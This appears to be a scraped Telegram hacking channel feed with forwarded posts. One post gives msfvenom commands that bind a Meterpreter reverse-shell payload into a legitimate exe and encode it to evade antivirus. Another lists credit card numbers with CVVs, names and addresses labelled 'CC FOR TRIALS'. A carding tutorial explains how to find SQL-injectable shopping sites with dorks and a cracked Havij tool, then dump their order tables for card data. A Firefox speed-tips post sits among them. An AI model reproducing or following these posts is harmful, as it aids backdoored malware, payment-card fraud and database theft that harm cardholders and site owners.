UNDERCODE COMMUNITY
2.66K subscribers
1.23K photos
31 videos
2.65K files
79K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
> HACK GMAIL
> JAVASCRIPT TUT
> IMAGES
>ICMP
>AND KERNEL TUTORIALS PDFS πŸ¦‘
Forwarded from UNDERCODE SECURITY
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘How to Create Windows Payload :

> Windows #Payloads

1️⃣- msfvenom -l encoders

2️⃣ - Lists all avalaible encoders

3️⃣- msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe

4️⃣ - Binds an exe with a Payload (Backdoors an exe)
-
5️⃣ msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -b Γ’β‚¬Λœ\x00Ò€ℒ -i 3 -f exe > example.exe

6️⃣- Creates a simple TCP payload with shikata_ga_nai encoder

7️⃣- msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -i 3 -b Ò€œ\x00Ò€ -f exe > example.exe

8️⃣ - Binds an exe with a Payload and encodes it

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE SECURITY
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Passive #Recon s:

#Website Exploration and "Google Hacking" :



* censys - https://censys.io/

* Spyse - https://spyse.com/

* netcraft - https://searchdns.netcraft.com/

* Google Hacking Database (GHDB) - https://www.exploit-db.com/google-hacking-database/

* ExifTool - https://www.sno.phy.queensu.ca/~phil/exiftool/

* Certficate Search - https://crt.sh/

* Huge TLS/SSL certificate DB with advanced search - https://certdb.com/

* Google Transparency Report - https://transparencyreport.google.com/https/certificates

* SiteDigger - http://www.mcafee.com/us/downloads/free-tools/sitedigger.aspx

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
πŸ¦‘CC FOR TRIALS :

Card Number: 4004442574863553
Exp. Date: 05|2021
CVV: 987
Name: Briney Serris
Address: 20 Chive Drive
Country: Macedonia

Card Number: 4031781367667508
Exp. Date: 11|2025
CVV: 777
Name: Natale Pochin
Address: 0506 Lakeland Hill
Country: United States

Card Number: 4561526282628764
Exp. Date: 04|2025
CVV: 806
Name: Sandye Yakubov
Address: 807 Summer Ridge Point
Country: Croatia

Card Number: 4588627538168784
Exp. Date: 09|2025
CVV: 741
Name: Briney Cainey
Address: 93 Pleasure Junction
Country: Ukraine

Card Number: 4550064331162075
Exp. Date: 11|2025
CVV: 442
Name: Zacharia Pochin
Address: 96308 Hudson Park
Country: United States

Card Number: 4049264010230784
Exp. Date: 05|2023
CVV: 479
Name: Hoyt Todarello
Address: 92 Mcguire Parkway
Country: Sweden

Card Number: 4171961620458628
Exp. Date: 10|2024
CVV: 165
Name: Jacob Bickerton
Address: 0506 Lakeland Hill
Country: United States
Forwarded from UNDERCODE SECURITY
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘SPEEDUP FIREFOX BROWSER TIPS
:

1️⃣Automatically enable hardware acceleration: This item allows Firefox to call your computer’s graphics processor instead of the CPU to display some web content with heavy graphics processing tasks (such as videos, games, etc.).

> This saves computer resources and speeds up the running of other programs (such as the Firefox program itself). This option is selected by default, but it is not applicable to all types of graphics processors. After modifying this setting, you must restart Firefox for it to take effect.

2️⃣Content process limitation: In order to enhance security and improve performance, Firefox now enables a multi-process architecture , which is also known as electrolysis ( e10s ). After the architecture is enabled, the web content on the tab page is moved to a separate process other than the main Firefox process, which can improve security and performance.

> Using the multi-content process function can further improve security and minimize the impact of content process crashes. With multi-process enabled, you can modify the limit on the number of content processes.

3️⃣Block all images from loading by default.

4️⃣Load the mobile version of websites.

5️⃣Discard inactive tabs to save memory.

6️⃣Clear the browser cache> options>
7️⃣Block all images from loading by default.

8️⃣install this plugin

https://addons.mozilla.org/en-US/firefox/addon/faster-pageload/

9️⃣ Disable Accessibility & tracking Services from preference

πŸ”Ÿinstall Bookmarklets

https://getpocket.com/add/?ep=1

rewritten by undercode
(sources -firefox support & wiki)
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
> Next tutorial Create your own live cc
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘How To Get Free Live CC For Carding ?

πŸ¦‘Requirements:

1️⃣Havij 1.16 Pro https://github.com/SilverPoision/Havij-cracked/blob/master/Havij-v1.16-Pro-Portable-_ed.7z

2️⃣SQLi-DB 1.1k [size=872kb

3️⃣http://www.mediafire.com/file/q8diiq854sqehhx/Fresh+Havij+Dorks.txt

3️⃣Carding Dorks 1.5k [size=8kb]


4️⃣Vulnerable Sites

πŸ¦‘How To Find Vulnerable Sites ?

1) First we are going to find shopping sites I mean vulnerable site. To find vulnerable sites, you need to use the SQLi-DB and the carding dorks. Let’s do it step by steps.

> Step 1. Copy one of the dork, i m using inurl:/merchandise/index.php?cat= and paste it in SQLi-DB.
Step 2. Set up the setting and click on the β€œ scan ” button. This is not high level setting, it is simple choose search engine, duplicate result should be removed or not. Set it yourself.
Step 4. Click on Vulnerable to filter the result and only show the vulnerable results. Bingo! Boom you completed your first task.
πŸ¦‘ Getting Data From Vulnerable Site:

Now, you need to run Havij as administrator and follow the steps below

Step 1. Paste the vulnerable site in the target TextBox on Havij and click Analyze .

Step 2. Once the process finished, you will see something like in the image below on your Havij log box.
Step 3. Click on Tables then Get Tables and you will see all the tables that are in the database.
Step 4. Now, look for a table named β€œ Orders ” or something similar. Tick the table and click on Get Columns.